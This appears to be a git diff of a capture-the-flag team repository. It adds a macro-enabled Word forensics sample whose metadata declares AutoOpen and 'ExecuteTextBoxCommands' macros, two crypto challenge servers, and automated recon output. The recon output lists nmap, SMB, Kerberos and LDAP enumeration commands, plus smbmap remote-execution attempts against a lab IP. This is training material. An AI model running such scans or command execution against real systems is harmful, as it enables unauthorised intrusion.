<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties" Target="docProps/app.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties" Target="docProps/core.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/></Relationships>

2
LaokoonHaxorcist/Forensics/Receipt/docProps/app.xml Normal file
View File

@@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"><Template>Normal.dotm</Template><TotalTime>5</TotalTime><Pages>1</Pages><Words>42</Words><Characters>244</Characters><DocSecurity>0</DocSecurity><Lines>2</Lines><Paragraphs>1</Paragraphs><ScaleCrop>false</ScaleCrop><Company></Company><LinksUpToDate>false</LinksUpToDate><CharactersWithSpaces>285</CharactersWithSpaces><SharedDoc>false</SharedDoc><HyperlinksChanged>false</HyperlinksChanged><AppVersion>16.0000</AppVersion></Properties>

2
LaokoonHaxorcist/Forensics/Receipt/docProps/core.xml Normal file
View File

@@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><dc:title></dc:title><dc:subject></dc:subject><cp:keywords></cp:keywords><dc:description></dc:description><dcterms:created xsi:type="dcterms:W3CDTF">2022-10-31T10:31:00Z</dcterms:created><dcterms:modified xsi:type="dcterms:W3CDTF">2022-10-31T10:36:00Z</dcterms:modified></cp:coreProperties>

BIN
LaokoonHaxorcist/Forensics/Receipt/forensics_receipt.zip Normal file
View File

Binary file not shown.

BIN
LaokoonHaxorcist/Forensics/Receipt/receipt.docm Normal file
View File

Binary file not shown.

2
LaokoonHaxorcist/Forensics/Receipt/word/_rels/document.xml.rels Normal file
View File

@@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId1" Type="http://schemas.microsoft.com/office/2006/relationships/vbaProject" Target="vbaProject.bin"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/></Relationships>

2
LaokoonHaxorcist/Forensics/Receipt/word/_rels/vbaProject.bin.rels Normal file
View File

@@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.microsoft.com/office/2006/relationships/wordVbaData" Target="vbaData.xml"/></Relationships>

BIN
LaokoonHaxorcist/Forensics/Receipt/word/base Normal file
View File

Binary file not shown.

2
LaokoonHaxorcist/Forensics/Receipt/word/document.xml Normal file
View File

File diff suppressed because one or more lines are too long

2
LaokoonHaxorcist/Forensics/Receipt/word/fontTable.xml Normal file
View File

@@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:fonts xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh"><w:font w:name="Calibri"><w:panose1 w:val="020F0502020204030204"/><w:charset w:val="00"/><w:family w:val="swiss"/><w:pitch w:val="variable"/><w:sig w:usb0="E4002EFF" w:usb1="C000247B" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/></w:font><w:font w:name="Times New Roman"><w:panose1 w:val="02020603050405020304"/><w:charset w:val="00"/><w:family w:val="roman"/><w:pitch w:val="variable"/><w:sig w:usb0="E0002EFF" w:usb1="C000785B" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/></w:font><w:font w:name="Calibri Light"><w:panose1 w:val="020F0302020204030204"/><w:charset w:val="00"/><w:family w:val="swiss"/><w:pitch w:val="variable"/><w:sig w:usb0="E4002EFF" w:usb1="C000247B" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/></w:font></w:fonts>

BIN
LaokoonHaxorcist/Forensics/Receipt/word/media/image1.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 82 KiB

2
LaokoonHaxorcist/Forensics/Receipt/word/settings.xml Normal file
View File

@@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:settings xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:sl="http://schemas.openxmlformats.org/schemaLibrary/2006/main" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh"><w:zoom w:percent="100"/><w:displayBackgroundShape/><w:proofState w:spelling="clean"/><w:defaultTabStop w:val="720"/><w:characterSpacingControl w:val="doNotCompress"/><w:compat><w:compatSetting w:name="compatibilityMode" w:uri="http://schemas.microsoft.com/office/word" w:val="15"/><w:compatSetting w:name="overrideTableStyleFontSizeAndJustification" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/><w:compatSetting w:name="enableOpenTypeFeatures" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/><w:compatSetting w:name="doNotFlipMirrorIndents" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/><w:compatSetting w:name="differentiateMultirowTableHeaders" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/><w:compatSetting w:name="useWord2013TrackBottomHyphenation" w:uri="http://schemas.microsoft.com/office/word" w:val="0"/></w:compat><w:rsids><w:rsidRoot w:val="00900D8D"/><w:rsid w:val="00643599"/><w:rsid w:val="00900D8D"/><w:rsid w:val="00B4781B"/><w:rsid w:val="00F73DB7"/></w:rsids><m:mathPr><m:mathFont m:val="Cambria Math"/><m:brkBin m:val="before"/><m:brkBinSub m:val="--"/><m:smallFrac m:val="0"/><m:dispDef/><m:lMargin m:val="0"/><m:rMargin m:val="0"/><m:defJc m:val="centerGroup"/><m:wrapIndent m:val="1440"/><m:intLim m:val="subSup"/><m:naryLim m:val="undOvr"/></m:mathPr><w:themeFontLang w:val="en-US"/><w:clrSchemeMapping w:bg1="light1" w:t1="dark1" w:bg2="light2" w:t2="dark2" w:accent1="accent1" w:accent2="accent2" w:accent3="accent3" w:accent4="accent4" w:accent5="accent5" w:accent6="accent6" w:hyperlink="hyperlink" w:followedHyperlink="followedHyperlink"/><w:shapeDefaults><o:shapedefaults v:ext="edit" spidmax="1026"/><o:shapelayout v:ext="edit"><o:idmap v:ext="edit" data="1"/></o:shapelayout></w:shapeDefaults><w:decimalSymbol w:val="."/><w:listSeparator w:val=","/><w14:docId w14:val="780CB214"/><w15:chartTrackingRefBased/><w15:docId w15:val="{5B54A621-30D5-45DE-A65C-7B32231FADF0}"/></w:settings>

2
LaokoonHaxorcist/Forensics/Receipt/word/styles.xml Normal file
View File

File diff suppressed because one or more lines are too long

2
LaokoonHaxorcist/Forensics/Receipt/word/theme/theme1.xml Normal file
View File

File diff suppressed because one or more lines are too long

2
LaokoonHaxorcist/Forensics/Receipt/word/vbaData.xml Normal file
View File

@@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<wne:vbaSuppData xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14"><wne:mcds><wne:mcd wne:macroName="PROJECT.NEWMACROS.AUTOOPEN" wne:name="Project.NewMacros.AutoOpen" wne:bEncrypt="00" wne:cmg="56"/><wne:mcd wne:macroName="PROJECT.NEWMACROS.EXECUTETEXTBOXCOMMANDS" wne:name="Project.NewMacros.ExecuteTextBoxCommands" wne:bEncrypt="00" wne:cmg="56"/></wne:mcds></wne:vbaSuppData>

BIN
LaokoonHaxorcist/Forensics/Receipt/word/vbaProject.bin Normal file
View File

Binary file not shown.

2
LaokoonHaxorcist/Forensics/Receipt/word/webSettings.xml Normal file
View File

@@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:webSettings xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh"><w:divs><w:div w:id="1316957779"><w:bodyDiv w:val="1"/><w:marLeft w:val="0"/><w:marRight w:val="0"/><w:marTop w:val="0"/><w:marBottom w:val="0"/><w:divBdr><w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/><w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/><w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/><w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/></w:divBdr></w:div></w:divs><w:optimizeForBrowser/><w:relyOnVML/><w:allowPNG/></w:webSettings>

7
LaokoonHaxorcist/README.md Normal file
View File

@@ -0,0 +1,7 @@
# Geplante Ordnerstruktur
<Challenge> (bei mehreren Maschinen, sonst Challenge==Maschine)
-> <Maschine>
->-> <Tool>
->->-> initial
->->-> full
->->-> script

42
LaokoonHaxorcist/crypto_me_is_me/server.py Normal file
View File

@@ -0,0 +1,42 @@
from secret import FLAG
from hashlib import sha256
class hash():
def __init__(self, message):
self.message = message
def rotate(self, message):
return [((b >> 4) | (b << 3)) & 0xff for b in message]
def hexdigest(self):
rotated = self.rotate(self.message)
return sha256(bytes(rotated)).hexdigest()
def main():
original_message = b"ready_play_one!"
original_digest = hash(original_message).hexdigest()
print(
f"Find a message that generate the same hash as this one: {original_digest}"
)
while True:
try:
message = input("Enter your message: ")
message = bytes.fromhex(message)
digest = hash(message).hexdigest()
if ((original_digest == digest) and (message != original_message)):
print(f"{FLAG}")
else:
print("Conditions not satisfied!")
except Exception as e:
print(f"An error occurred while processing data: {e}")
if __name__ == '__main__':
main()

58
LaokoonHaxorcist/crypto_psa_games/server.py Normal file
View File

@@ -0,0 +1,58 @@
from Crypto.Util.number import bytes_to_long, getPrime, GCD
from Crypto.Util.Padding import pad
# from secret import FLAG
WELCOME = '''Welcome to my custom PSA cryptosystem!
In this cryptosystem, the message is PKCS#7 padded and then encrypted with RSA.
They say padding makes encryption more secure, right? ;)'''
MENU = '''
[1] Encrypt the flag
[2] Exit
'''
class PSA:
def __init__(self):
self.bit_size = 512
self.e = 11
def gen_modulus(self):
while True:
p = getPrime(self.bit_size // 2)
q = getPrime(self.bit_size // 2)
if GCD(self.e, (p - 1) * (q - 1)) == 1:
break
return p * q
def encrypt(self, msg):
m = bytes_to_long(pad(msg, 16))
n = self.gen_modulus()
c = pow(m, self.e, n)
return c, n
def main():
psa = PSA()
print(WELCOME)
while True:
try:
print(MENU)
opt = input('> ')
if opt == '1':
enc, modulus = psa.encrypt(b'FLAG')
print(f"\n{hex(enc)}\n{hex(modulus)}")
elif opt == '2':
print('Bye.')
exit(1)
else:
print('\nInvalid option!')
except:
print('\n\nSomething went wrong.')
exit(1)
if __name__ == '__main__':
# main()
print(0x65c96a10a5553c2eb1b05ac1369a777089841005b055cbf8dcafc41fd1d11b0a0306b820cbc742796318694b9fdf145214ef3a2385984daa0d6d5ba87bdce687)

1
LaokoonHaxorcist/fullpwn/ferox-http_10_129_243_131:80_-1698492933.state Normal file
View File

File diff suppressed because one or more lines are too long

0
Blockharbor/rev/Reversing #1/angr.py → LaokoonHaxorcist/fullpwn/hashes.asreproast
View File

0
LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/local.txt Normal file
View File

244
LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/notes.txt Normal file
View File

@@ -0,0 +1,244 @@
[*] domain found on tcp/53.
[*] http found on tcp/80.
[*] kerberos-sec found on tcp/88.
[*] msrpc found on tcp/135.
[*] netbios-ssn found on tcp/139.
[*] ldap found on tcp/389.
[*] microsoft-ds found on tcp/445.
[*] kpasswd5 found on tcp/464.
[*] ncacn_http found on tcp/593.
[*] tcpwrapped found on tcp/636.
[*] ldap found on tcp/3268.
[*] tcpwrapped found on tcp/3269.
[*] wsman found on tcp/5985.
[*] mc-nmf found on tcp/9389.
[*] msrpc found on tcp/49667.
[*] msrpc found on tcp/49673.
[*] ncacn_http found on tcp/49674.
[*] msrpc found on tcp/49695.
[*] msrpc found on tcp/49843.
[*] domain found on tcp/53.
[*] http found on tcp/80.
[*] kerberos-sec found on tcp/88.
[*] msrpc found on tcp/135.
[*] netbios-ssn found on tcp/139.
[*] ldap found on tcp/389.
[*] microsoft-ds found on tcp/445.
[*] kpasswd5 found on tcp/464.
[*] ncacn_http found on tcp/593.
[*] tcpwrapped found on tcp/636.
[*] ldap found on tcp/3268.
[*] tcpwrapped found on tcp/3269.
[*] wsman found on tcp/5985.
[*] mc-nmf found on tcp/9389.
[*] unknown found on tcp/49667.
[*] unknown found on tcp/49673.
[*] ncacn_http found on tcp/49674.
[*] unknown found on tcp/49695.
[*] unknown found on tcp/49843.
[*] domain found on udp/53.
[*] ntp found on udp/123.
[*] domain found on tcp/53.
[*] http found on tcp/80.
[*] kerberos-sec found on tcp/88.
[*] msrpc found on tcp/135.
[*] netbios-ssn found on tcp/139.
[*] ldap found on tcp/389.
[*] microsoft-ds found on tcp/445.
[*] kpasswd5 found on tcp/464.
[*] ncacn_http found on tcp/593.
[*] tcpwrapped found on tcp/636.
[*] ldap found on tcp/3268.
[*] tcpwrapped found on tcp/3269.
[*] wsman found on tcp/5985.
[*] mc-nmf found on tcp/9389.
[*] msrpc found on tcp/49667.
[*] ncacn_http found on tcp/49674.
[*] msrpc found on tcp/49695.
[*] msrpc found on tcp/49843.
[*] domain found on udp/53.
[*] kerberos-sec found on udp/88.
[*] ntp found on udp/123.

0
LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/proof.txt Normal file
View File

177
LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Commands.md Normal file
View File

@@ -0,0 +1,177 @@
```bash
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_quick_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml" 10.129.243.131
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_full_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml" 10.129.243.131
nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_top_100_udp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_top_100_udp_nmap.xml" 10.129.243.131
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_quick_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml" 10.129.243.131
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_full_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml" 10.129.243.131
nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_top_100_udp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_top_100_udp_nmap.xml" 10.129.243.131
dig -p 53 -x 10.129.243.131 @10.129.243.131
dig AXFR -p 53 @10.129.243.131
nmap -vv --reason -Pn -T4 -sV -p 53 --script="banner,(dns* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dns_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/xml/tcp_53_dns_nmap.xml" 10.129.243.131
feroxbuster -u http://10.129.243.131:80/ -t 10 -w /root/.local/share/AutoRecon/wordlists/dirbuster.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -q -e -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt"
curl -sSikf http://10.129.243.131:80/.well-known/security.txt
curl -sSikf http://10.129.243.131:80/robots.txt
curl -sSik http://10.129.243.131:80/
nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/xml/tcp_80_http_nmap.xml" 10.129.243.131
whatweb --color=never --no-errors -a 3 -v http://10.129.243.131:80 2>&1
wkhtmltoimage --format png http://10.129.243.131:80/ /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_screenshot.png
nmap -vv --reason -Pn -T4 -sV -p 88 --script="banner,krb5-enum-users" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/tcp_88_kerberos_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/xml/tcp_88_kerberos_nmap.xml" 10.129.243.131
impacket-getArch -target 10.129.243.131
nmap -vv --reason -Pn -T4 -sV -p 135 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/xml/tcp_135_rpc_nmap.xml" 10.129.243.131
impacket-rpcdump -port 135 10.129.243.131
enum4linux -a -M -l -d 10.129.243.131 2>&1
nbtscan -rvh 10.129.243.131 2>&1
nmap -vv --reason -Pn -T4 -sV -p 139 --script="banner,(nbstat or smb* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/xml/tcp_139_smb_nmap.xml" 10.129.243.131
smbclient -L //10.129.243.131 -N -I 10.129.243.131 2>&1
smbmap -H 10.129.243.131 -P 139 2>&1
nmap -vv --reason -Pn -T4 -sV -p 389 --script="banner,(ldap* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/tcp_389_ldap_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/xml/tcp_389_ldap_nmap.xml" 10.129.243.131
nmap -vv --reason -Pn -T4 -sV -p 445 --script="banner,(nbstat or smb* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/tcp_445_smb_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/xml/tcp_445_smb_nmap.xml" 10.129.243.131
smbmap -H 10.129.243.131 -P 445 2>&1
nmap -vv --reason -Pn -T4 -sV -p 464 --script="banner,krb5-enum-users" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/tcp_464_kerberos_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/xml/tcp_464_kerberos_nmap.xml" 10.129.243.131
impacket-rpcdump -port 593 10.129.243.131
nmap -vv --reason -Pn -T4 -sV -p 3268 --script="banner,(ldap* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/xml/tcp_3268_ldap_nmap.xml" 10.129.243.131
nmap -vv --reason -Pn -T4 -sV -p 49667 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49667/tcp_49667_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49667/xml/tcp_49667_rpc_nmap.xml" 10.129.243.131
nmap -vv --reason -Pn -T4 -sV -p 49673 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49673/tcp_49673_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49673/xml/tcp_49673_rpc_nmap.xml" 10.129.243.131
nmap -vv --reason -Pn -T4 -sV -p 49695 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49695/tcp_49695_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49695/xml/tcp_49695_rpc_nmap.xml" 10.129.243.131
nmap -vv --reason -Pn -T4 -sV -p 49843 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49843/tcp_49843_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49843/xml/tcp_49843_rpc_nmap.xml" 10.129.243.131
smbmap -u null -p "" -H 10.129.243.131 -P 139 2>&1
smbmap -u null -p "" -H 10.129.243.131 -P 445 2>&1
smbmap -H 10.129.243.131 -P 139 -R 2>&1
smbmap -H 10.129.243.131 -P 445 -R 2>&1
smbmap -u null -p "" -H 10.129.243.131 -P 445 -R 2>&1
smbmap -u null -p "" -H 10.129.243.131 -P 139 -R 2>&1
smbmap -H 10.129.243.131 -P 445 -x "ipconfig /all" 2>&1
smbmap -H 10.129.243.131 -P 139 -x "ipconfig /all" 2>&1
smbmap -u null -p "" -H 10.129.243.131 -P 445 -x "ipconfig /all" 2>&1
smbmap -u null -p "" -H 10.129.243.131 -P 139 -x "ipconfig /all" 2>&1
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_quick_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml" 10.129.243.131
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_full_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml" 10.129.243.131
nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_top_100_udp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_top_100_udp_nmap.xml" 10.129.243.131
dig -p 53 -x 10.129.243.131 @10.129.243.131
dig AXFR -p 53 @10.129.243.131
